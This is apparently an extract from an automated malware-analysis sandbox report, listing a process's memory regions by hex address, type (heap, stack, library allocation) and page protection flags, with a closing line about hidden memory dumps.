heap
page read and write
660000
heap
page read and write
23E0000
heap
page execute and read and write
2B7F000
stack
page read and write
2ACE000
stack
page read and write
289F000
stack
page read and write
23A2000
heap
page read and write
D90000
trusted library allocation
page read and write
2F0000
heap
page read and write
42C0000
trusted library allocation
page read and write
10000
heap
page read and write
2813000
trusted library allocation
page read and write
516000
heap
page read and write
26BE000
trusted library allocation
page read and write
2390000
trusted library allocation
page read and write
157000
stack
page read and write
536000
heap
page read and write
27EE000
trusted library allocation
page read and write
961000
heap
page read and write
D20000
trusted library allocation
page read and write
45D000
system
page execute and read and write
950000
heap
page read and write
D30000
trusted library allocation
page read and write
320000
trusted library allocation
page execute and read and write
473000
system
page execute and read and write
4D0000
heap
page read and write
2DC5000
heap
page read and write
71E000
heap
page read and write
2ED000
heap
page read and write
4F14000
heap
page read and write
27D8000
trusted library allocation
page read and write
296A000
trusted library allocation
page read and write
4DDE000
stack
page read and write
456C000
stack
page read and write
26C000
stack
page read and write
4A2E000
stack
page read and write
51F000
heap
page read and write
66E000
heap
page read and write
8D7000
heap
page read and write
2E0000
heap
page read and write
26D5000
trusted library allocation
page read and write
205000
trusted library allocation
page execute and read and write
27E0000
trusted library allocation
page read and write
4110000
heap
page read and write
5282000
heap
page read and write
6340000
trusted library section
page read and write
3C0000
trusted library allocation
page read and write
2A4000
heap
page read and write
1FCE000
stack
page read and write
959000
heap
page read and write
1DAD000
stack
page read and write
3AF000
stack
page read and write
298F000
stack
page read and write
C60000
trusted library allocation
page read and write
4E80000
heap
page read and write
40AD000
stack
page read and write
23C0000
trusted library allocation
page read and write
4C8E000
stack
page read and write
71B000
heap
page read and write
490000
trusted library allocation
page read and write
2F0000
heap
page read and write
2BB3000
heap
page read and write
4C4E000
stack
page read and write
27B0000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
2DD6000
heap
page read and write
4EE000
stack
page read and write | page guard
4C8F000
stack
page read and write
AAE000
stack
page read and write
406F000
stack
page read and write
B41000
heap
page read and write
63E000
stack
page read and write
1D6E000
stack
page read and write
336000
heap
page read and write
1CE0000
heap
page read and write
2481000
trusted library allocation
page read and write
2E9E000
stack
page read and write
37D4000
heap
page read and write
10000
heap
page read and write
2BD8000
heap
page read and write
35E9000
trusted library allocation
page read and write
6CE000
heap
page read and write
5DE000
heap
page read and write
2B9E000
heap
page read and write
3210000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
8C000
stack
page read and write
280000
heap
page read and write
35BE000
stack
page read and write
4C4B000
stack
page read and write
DDD000
stack
page read and write
3F0000
trusted library allocation
page read and write
5C0000
heap
page read and write
35F0000
heap
page read and write
76E000
stack
page read and write
DF0000
trusted library allocation
page read and write
8BF000
stack
page read and write
46B0000
heap
page read and write
292A000
trusted library allocation
page read and write
BDE000
stack
page read and write
24D4000
trusted library allocation
page read and write
5CE000
heap
page read and write
44F000
heap
page read and write
42C0000
trusted library allocation
page read and write
49A000
heap
page read and write
42C0000
trusted library allocation
page read and write
1DEE000
stack
page read and write
534E000
stack
page read and write
71E000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
4A30000
heap
page read and write
23B0000
trusted library allocation
page read and write
2C0E000
stack
page read and write
516000
heap
page read and write
718000
heap
page read and write
2340000
trusted library allocation
page read and write
4B2D000
heap
page read and write
238000
trusted library allocation
page read and write
25A000
heap
page read and write
5E7E000
stack
page read and write
C76000
heap
page execute and read and write
3B4000
stack
page read and write
1008000
heap
page read and write
2AB0000
heap
page read and write
4B4E000
stack
page read and write
5200000
heap
page read and write
2DE5000
heap
page read and write
516000
heap
page read and write
A3E000
heap
page read and write
1C0000
heap
page read and write
45E000
heap
page read and write
2DE7000
heap
page read and write
859000
heap
page read and write
459000
system
page execute and read and write
2C1E000
heap
page read and write
27DC000
trusted library allocation
page read and write
41F000
system
page execute and read and write
696000
heap
page read and write
89000
stack
page read and write
5D3F000
stack
page read and write
5260000
heap
page read and write
10000
heap
page read and write
2E5000
heap
page read and write
6511000
trusted library allocation
page read and write
4DCE000
stack
page read and write
1E00000
heap
page read and write
619E000
stack
page read and write
8F0000
heap
page read and write
5264000
heap
page read and write
480000
heap
page read and write
2BE000
heap
page read and write
52D0000
heap
page read and write
4F3B000
heap
page read and write
F5E000
stack
page read and write
45BC000
stack
page read and write
4E9E000
stack
page read and write
2440000
heap
page read and write
180000
trusted library allocation
page read and write
4F3000
heap
page read and write
2F0000
heap
page read and write
515000
heap
page read and write
49B000
heap
page read and write
400000
system
page execute and read and write
3EC000
stack
page read and write
4CD000
heap
page read and write
3DAE000
stack
page read and write
427B000
heap
page read and write
369000
trusted library allocation
page read and write
2DD1000
heap
page read and write
309000
trusted library allocation
page read and write
670000
heap
page read and write
233C000
stack
page read and write
21C000
stack
page read and write
8EA000
heap
page read and write
D80000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
3F0F000
stack
page read and write
2C70000
heap
page read and write
1E10000
direct allocation
page read and write
288F000
stack
page read and write
830000
heap
page read and write
2C16000
heap
page read and write
B40000
heap
page read and write
717000
heap
page read and write
51AE000
stack
page read and write
424C000
stack
page read and write
34CE000
stack
page read and write
22C0000
trusted library allocation
page read and write
2BA8000
heap
page read and write
24B000
stack
page read and write
2DCF000
heap
page read and write
140000
heap
page read and write
2DC5000
heap
page read and write
3F6F000
stack
page read and write
327F000
stack
page read and write
2384000
heap
page read and write
4D3D000
stack
page read and write
2BC0000
heap
page read and write
2FEE000
stack
page read and write
DDE000
stack
page read and write
3E2F000
stack
page read and write
2BA6000
heap
page read and write
D80000
trusted library allocation
page execute and read and write
241E000
stack
page read and write
338000
heap
page read and write
2DE7000
heap
page read and write
10000
heap
page read and write
38F0000
heap
page read and write
4ACE000
stack
page read and write
230000
trusted library allocation
page read and write
2C0B000
heap
page read and write
120D000
stack
page read and write
6010000
heap
page read and write
D4D000
stack
page read and write
4ADE000
stack
page read and write
2C1B000
heap
page read and write
29CE000
stack
page read and write
650000
heap
page read and write
42C0000
trusted library allocation
page read and write
2BE2000
heap
page read and write
4F51000
heap
page read and write
307000
heap
page read and write
944000
heap
page read and write
3B0000
trusted library allocation
page read and write
4C0D000
stack
page read and write
2C13000
heap
page read and write
4EDD000
heap
page read and write
270000
trusted library allocation
page read and write
2B9D000
heap
page read and write
4E7E000
stack
page read and write
5DDE000
stack
page read and write
A0000
heap
page read and write
4C8E000
stack
page read and write | page guard
28D0000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
2DE7000
heap
page read and write
4A8D000
stack
page read and write
75F000
heap
page read and write
4EF000
stack
page read and write
10016000
direct allocation
page execute and read and write
200000
trusted library allocation
page read and write
336000
heap
page read and write
11AE000
stack
page read and write
263F000
stack
page read and write
48C000
heap
page read and write
D0E000
stack
page read and write
307000
trusted library allocation
page read and write
340000
heap
page read and write
2BAB000
heap
page read and write
A30000
heap
page read and write
27F000
stack
page read and write
8F5000
heap
page read and write
530F000
stack
page read and write
780000
heap
page read and write
2C1E000
heap
page read and write
3210000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
600F000
stack
page read and write
323000
heap
page read and write
42C0000
trusted library allocation
page read and write
33A000
heap
page read and write
288000
trusted library allocation
page read and write
2F9E000
stack
page read and write
3600000
heap
page read and write
2481000
trusted library allocation
page read and write
100000
heap
page read and write
1EC000
stack
page read and write
B2E000
heap
page read and write
10000
heap
page read and write
4BCE000
stack
page read and write
57E000
heap
page read and write
2800000
trusted library allocation
page read and write
B1D000
heap
page read and write
26EE000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
4CEE000
stack
page read and write
3C6D000
stack
page read and write
D4E000
stack
page read and write
460000
heap
page read and write
10CE000
stack
page read and write
592000
heap
page read and write
8B7000
heap
page read and write
10000
heap
page read and write
193000
trusted library allocation
page execute and read and write
287000
heap
page read and write
19D000
trusted library allocation
page execute and read and write
35D0000
trusted library allocation
page read and write
2F4000
heap
page read and write
2932000
trusted library allocation
page read and write
3D40000
heap
page read and write
22E000
stack
page read and write
1F00000
heap
page read and write
752000
heap
page read and write
2C16000
heap
page read and write
2CE000
stack
page read and write
130000
heap
page read and write
2DD6000
heap
page read and write
378D000
stack
page read and write
4D9000
heap
page read and write
26D9000
trusted library allocation
page read and write
312000
heap
page read and write
40B000
heap
page read and write
2BC7000
heap
page read and write
3B2000
stack
page read and write
1B0000
heap
page read and write
20CF000
stack
page read and write
2BDD000
heap
page read and write
325000
heap
page read and write
4FC000
heap
page read and write
337F000
stack
page read and write
690000
heap
page read and write
C70000
heap
page execute and read and write
34A9000
trusted library allocation
page read and write
51F000
heap
page read and write
3E8000
stack
page read and write
239D000
trusted library allocation
page read and write
There are 654 hidden memdumps, click here to show them.